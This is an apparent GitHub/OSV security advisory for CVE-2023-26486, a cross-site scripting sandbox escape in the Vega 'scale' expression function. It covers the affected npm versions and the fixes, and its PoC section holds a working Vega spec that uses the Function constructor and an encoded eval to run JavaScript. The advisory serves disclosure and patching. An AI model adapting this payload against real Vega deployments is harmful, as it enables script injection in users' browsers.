{ "schema_version": "1.4.0", "id": "GHSA-4vq7-882g-wcg4", "modified": "2023-03-09T21:58:49Z", "published": "2023-03-02T23:11:05Z", "aliases": [ "CVE-2023-26486" ], "summary": "Vega Expression Language `scale` expression function Cross Site Scripting", "details": "### Summary\nThe Vega `scale` expression function has the ability to call arbitrary functions with a single controlled argument. This can be exploited to escape the Vega expression sandbox in order to execute arbitrary JavaScript.\n\n### Details\n\nThe [scale](https://github.dev/vega/vega/blob/72b9b3bbf912212e7879b6acaccc84aff969ef1c/packages/vega-functions/src/functions/scale.js#L36-L37) expression function passes a user supplied argument `group` to [getScale](https://github.dev/vega/vega/blob/72b9b3bbf912212e7879b6acaccc84aff969ef1c/packages/vega-functions/src/scales.js#L6), which is then used as if it were an internal context. The `context.scales[name].value` is accessed from `group` and called as a function back in `scale`.\n\n### PoC\nThe following Vega definition can be used to demonstrate this issue executing the JavaScript code `alert(1);`\n```json\n{\n \"$schema\": \"https://vega.github.io/schema/vega/v5.json\",\n \"data\": [\n {\n \"name\": \"XSS PoC\",\n \"values\": [1],\n \"transform\": [\n {\n \"type\": \"formula\",\n \"as\": \"amount\",\n \"expr\": \"scale('func', null, {context: {scales: {func: {value: scale('func', 'eval(atob(\\\"YWxlcnQoMSk7\\\"))', {context: {scales: {func: {value: [].constructor.constructor}}}})}}}})\"\n }\n ]\n }\n ]\n}\n```\n\nThis can be viewed in the Vega online IDE at https://vega.github.io/editor/#/url/vega/N4IgJAzgxgFgpgWwIYgFwhgF0wBwqgegIDc4BzJAOjIEtMYBXAI0poHsDp5kTykSArJQBWENgDsQAGhAATJJhSoA2qHFIEcNCAAaAZT0ACAApsAwtJDEkAGwZwIaZQEYAujMwAnJOIgAzNk8EJ1BMAE8cLXQAoIYbFBkkR3QNNgZxTEs4AA8cT21oWzgACgByP3SoUqlDcTibGsNgKAlMHMxUJsKbB07gCvEoPus7OE7ukvLK6sNSuBHihTYmYoAdEABNAHVsmyhxAEU2AFk9AGsAdnWASmuZ5tb2von8JoGhppH7TuVXShbfF4GFBMIF-hIIECQYEAL5wmHXeEIkAw1yomFAA\n\n", "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], "affected": [ { "package": { "ecosystem": "npm", "name": "vega-functions" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "5.13.1" } ] } ] }, { "package": { "ecosystem": "npm", "name": "vega" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "5.23.0" } ] } ] } ], "references": [ { "type": "WEB", "url": "https://github.com/vega/vega/security/advisories/GHSA-4vq7-882g-wcg4" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26486" }, { "type": "PACKAGE", "url": "https://github.com/vega/vega" }, { "type": "WEB", "url": "https://github.com/vega/vega/releases/tag/v5.23.0" }, { "type": "WEB", "url": "https://github.dev/vega/vega/blob/72b9b3bbf912212e7879b6acaccc84aff969ef1c/packages/vega-functions/src/functions/scale.js#L36-L37" }, { "type": "WEB", "url": "https://github.dev/vega/vega/blob/72b9b3bbf912212e7879b6acaccc84aff969ef1c/packages/vega-functions/src/scales.js#L6" }, { "type": "WEB", "url": "https://vega.github.io/editor/#/url/vega/N4IgJAzgxgFgpgWwIYgFwhgF0wBwqgegIDc4BzJAOjIEtMYBXAI0poHsDp5kTykSArJQBWENgDsQAGhAATJJhSoA2qHFIEcNCAAaAZT0ACAApsAwtJDEkAGwZwIaZQEYAujMwAnJOIgAzNk8EJ1BMAE8cLXQAoIYbFBkkR3QNNgZxTEs4AA8cT21oWzgACgByP3SoUqlDcTibGsNgKAlMHMxUJsKbB07gCvEoPus7OE7ukvLK6sNSuBHihTYmYoAdEABNAHVsmyhxAEU2AFk9AGsAdnWASmuZ5tb2von8JoGhppH7TuVXShbfF4GFBMIF-hIIECQYEAL5wmHXeEIkAw1yomFAA" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2023-03-02T23:11:05Z", "nvd_published_at": "2023-03-04T00:15:00Z" } }